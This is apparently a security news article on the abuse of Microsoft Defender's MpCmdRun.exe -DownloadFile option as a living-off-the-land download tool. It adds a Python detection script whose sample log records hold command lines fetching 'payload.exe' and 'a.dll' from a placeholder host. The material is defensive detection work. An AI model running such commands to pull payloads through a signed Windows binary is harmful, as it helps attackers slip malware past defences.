Microsoft Defender is back in the news, shortly after Microsoft stopped letting it be disabled through the Windows registry. Microsoft recently added a download feature to Defender's command-line tool, and security researchers point out that attackers can use that same feature to fetch malicious programs.
With Microsoft Defender antimalware platform version 4.18.2007.9 or 4.18.2009.9, Microsoft introduced an option to download files from the command line. The syntax is:
MpCmdRun.exe -DownloadFile -url [url] -path [path to save file]
There is no vulnerability in the feature itself, but any script or process already running on the machine can invoke it to pull further files from the Internet through a signed, built-in Windows binary, which makes MpCmdRun.exe one more living-off-the-land binary (LOLBin). Adding this function to Windows Defender means there is one more program administrators need to keep an eye on, and one more program attackers can use.
Askar, a security researcher, said that attackers could abuse these improvements to the command-line tool shipped with Microsoft Defender. In other words, attackers can misuse the binary to download any file, including malware, from the Internet.
This also means that Microsoft Defender itself can be used to download any file from the Internet. On its own this is unlikely to be a major security hole: once the command-line tool finishes the download, Defender's real-time protection still scans the file, so anything Defender already recognizes is caught. The scan does nothing, however, for a file Defender has no detection for, which is why the process creation itself is worth watching.
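Since the article's practical takeaway is that administrators now have one more program to watch, the following is an added detection example (not code from the article or from Microsoft) that hunts process-creation records for MpCmdRun.exe launched with -DownloadFile. The record format is a constructed, Sysmon-style "Field: value | Field: value" text line chosen so the example runs offline; the paths, the platform version folder, the URLs and the list of script-host parents are assumptions for illustration, so adapt parse_event() and SCRIPT_HOSTS to your own log source.

```python
"""Hunt process-creation records for MpCmdRun.exe -DownloadFile (added example)."""
import re

# Constructed sample records in a Sysmon-like text format. Paths, the
# platform version folder and the URLs are made up for this example.
SAMPLE_EVENTS = [
    # Routine signature update launched by the Defender service: benign.
    r'Image: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.9-0\MpCmdRun.exe'
    r' | CommandLine: "MpCmdRun.exe" -SignatureUpdate'
    r' | ParentImage: C:\Windows\System32\svchost.exe',
    # The pattern from the article: an arbitrary download started from a shell.
    r'Image: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.9-0\MpCmdRun.exe'
    r' | CommandLine: "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.9-0\MpCmdRun.exe" -DownloadFile -url https://example.invalid/payload.exe -path C:\Users\Public\payload.exe'
    r' | ParentImage: C:\Windows\System32\cmd.exe',
    # Same abuse with different casing, a quoted path and a copied binary.
    r'Image: C:\Users\Public\mpcmdrun.exe'
    r' | CommandLine: mpcmdrun.exe -downloadfile -url http://example.invalid/a.dll -path "C:\Users\Public\a.dll"'
    r' | ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    # Unrelated process creation.
    r'Image: C:\Windows\System32\notepad.exe'
    r' | CommandLine: notepad.exe C:\Users\alice\notes.txt'
    r' | ParentImage: C:\Windows\explorer.exe',
]

# "Field: value | Field: value" splitter for the constructed format above.
FIELD_RE = re.compile(r'(\w+): (.*?)(?= \| \w+: |$)')

# Windows switches are case-insensitive, so match them that way.
DOWNLOAD_FLAG = re.compile(r'(?<!\S)-DownloadFile(?!\S)', re.IGNORECASE)
URL_ARG = re.compile(r'-url\s+(\S+)', re.IGNORECASE)
PATH_ARG = re.compile(r'-path\s+("[^"]*"|\S+)', re.IGNORECASE)

# Assumed list of interactive shells and script hosts; Defender's own
# service normally starts MpCmdRun.exe, so these parents stand out.
SCRIPT_HOSTS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe',
                'cscript.exe', 'mshta.exe', 'rundll32.exe'}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def parse_event(line):
    """Turn one constructed record into a dict of field -> value."""
    return {m.group(1): m.group(2) for m in FIELD_RE.finditer(line)}


def detect_download(event):
    """Return a finding dict for an MpCmdRun.exe -DownloadFile launch, else None."""
    # Match on the file name, not the full path, so a copied binary is caught too.
    if basename(event.get('Image', '')) != 'mpcmdrun.exe':
        return None
    cmd = event.get('CommandLine', '')
    if not DOWNLOAD_FLAG.search(cmd):
        return None
    url = URL_ARG.search(cmd)
    path = PATH_ARG.search(cmd)
    parent = basename(event.get('ParentImage', ''))
    return {
        'url': url.group(1) if url else None,
        'path': path.group(1).strip('"') if path else None,
        'parent': parent,
        'suspicious_parent': parent in SCRIPT_HOSTS,
        # Rough heuristic: the genuine binary lives under a "Windows Defender" folder.
        'copied_binary': 'windows defender' not in event.get('Image', '').lower(),
    }


def scan(lines):
    """Run the detector over every record and collect the findings."""
    findings = []
    for line in lines:
        finding = detect_download(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Running the script over the constructed records flags only the two -DownloadFile launches and ignores the routine signature update, which is the distinction a rule for this binary has to make: MpCmdRun.exe itself is expected on every Windows machine, so the alert has to key on the download switch and on who started the process.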